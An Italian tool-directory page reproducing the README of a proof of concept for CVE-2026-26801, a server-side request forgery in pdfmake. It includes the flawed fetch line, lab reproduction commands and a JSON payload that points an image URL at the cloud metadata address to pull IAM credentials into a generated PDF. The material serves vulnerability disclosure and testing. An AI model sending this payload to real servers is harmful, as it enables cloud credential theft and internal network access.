Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC per CVE-2026-26801: SSRF in pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Vedi Repository
5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC della vulnerabilità SSRF in pdfmake

Riepilogo della vulnerabilità

CampoValore
Pacchettopdfmake
Versione>= 0.3.0-beta.2, <= 0.3.5
Corretta0.3.6
CVECVE-2026-26801
TipoServer-Side Request Forgery (SSRF)
Posizionesrc/URLResolver.js
GravitàALTA

Causa principale

root@kitploit:~
// URLResolver.js riga 3
const response = await fetch(url, { headers });  // NESSUNA VALIDAZIONE!

Quando docDefinition contiene URL in images, attachments o files, pdfmake li recupera senza alcuna validazione:

  • Nessuna allowlist/blocklist per i domini
  • Nessuna protezione contro IP interni (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • Header personalizzati supportati (consente il bypass dell'autenticazione)

Riproduzione

Configurazione

root@kitploit:~
npm install

Terminale 1 - Server mock dei metadati AWS

root@kitploit:~
npm run metadata

Terminale 2 - Server PDF vulnerabile

root@kitploit:~
npm run server

Terminale 3 - Esegui l'attacco

SSRF cieco (dimostra che il server effettua richieste in uscita):

root@kitploit:~
npm run attack

SSRF con lettura completa (credenziali incorporate nel PDF generato):

root@kitploit:~
npm run exfiltrate

Risultati attesi

SSRF cieco (npm run attack)

Output del server dei metadati:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENZIALI DIVULGATE! <<<

Questo dimostra che il server vulnerabile ha effettuato una richiesta in uscita verso il nostro endpoint controllato.

SSRF con lettura completa (npm run exfiltrate)

Lo script di attacco genera exfiltrated.pdf. Aprilo con qualsiasi visualizzatore PDF e il JSON delle credenziali AWS sarà incorporato come allegato (metadata.json). Questo dimostra l'esfiltrazione completa dei dati, non solo SSRF cieco. L'attaccante riceve il corpo della risposta effettiva all'interno del PDF.

Impatto nel mondo reale

  1. Furto di credenziali AWS/GCP/Azure - Accesso agli endpoint dei metadati cloud
  2. Accesso alla rete interna - Raggiungimento dei servizi interni
  3. Scansione delle porte - Enumerazione dell'infrastruttura interna
  4. Bypass dell'autenticazione - Header personalizzati per aggirare l'autenticazione

Payload dell'attacco

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Writeup

Writeup tecnico completo con la storia di come è stata trovata, la catena di attacco e la timeline della divulgazione: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Scarica lo strumento